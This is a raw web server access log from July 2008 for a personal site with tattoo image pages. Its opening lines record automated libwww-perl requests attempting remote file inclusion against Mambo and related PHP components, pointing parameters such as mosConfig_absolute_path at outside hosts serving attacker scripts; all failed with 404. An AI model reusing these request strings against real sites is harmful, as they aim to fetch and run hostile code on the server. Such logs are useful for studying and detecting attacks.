195.168.33.226 - - [03/Jul/2008:01:12:53 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
195.168.33.226 - - [03/Jul/2008:01:12:53 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
193.198.217.3 - - [03/Jul/2008:01:13:13 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
193.198.217.3 - - [03/Jul/2008:01:13:14 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
200.101.231.12 - - [03/Jul/2008:01:13:33 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
200.101.231.12 - - [03/Jul/2008:01:13:40 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
74.53.178.146 - - [03/Jul/2008:01:16:03 -0500] "GET //config/dbutil.bck.php?confdir=http://zondata.com/cache/n??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
74.53.178.146 - - [03/Jul/2008:01:16:03 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://zondata.com/cache/n??? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
87.246.68.55 - - [03/Jul/2008:01:17:17 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://zondata.com/cache/n??? HTTP/1.1" 404 311 "-""libwww-perl/5.800"
87.246.68.55 - - [03/Jul/2008:01:17:17 -0500] "GET //config/dbutil.bck.php?confdir=http://zondata.com/cache/n??? HTTP/1.1" 404 306 "-""libwww-perl/5.800"
76.188.3.136 - - [03/Jul/2008:01:18:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:01 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:01 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:09 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:09 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:09 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:09 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:09 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:09 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:09 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.188.3.136 - - [03/Jul/2008:01:18:10 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X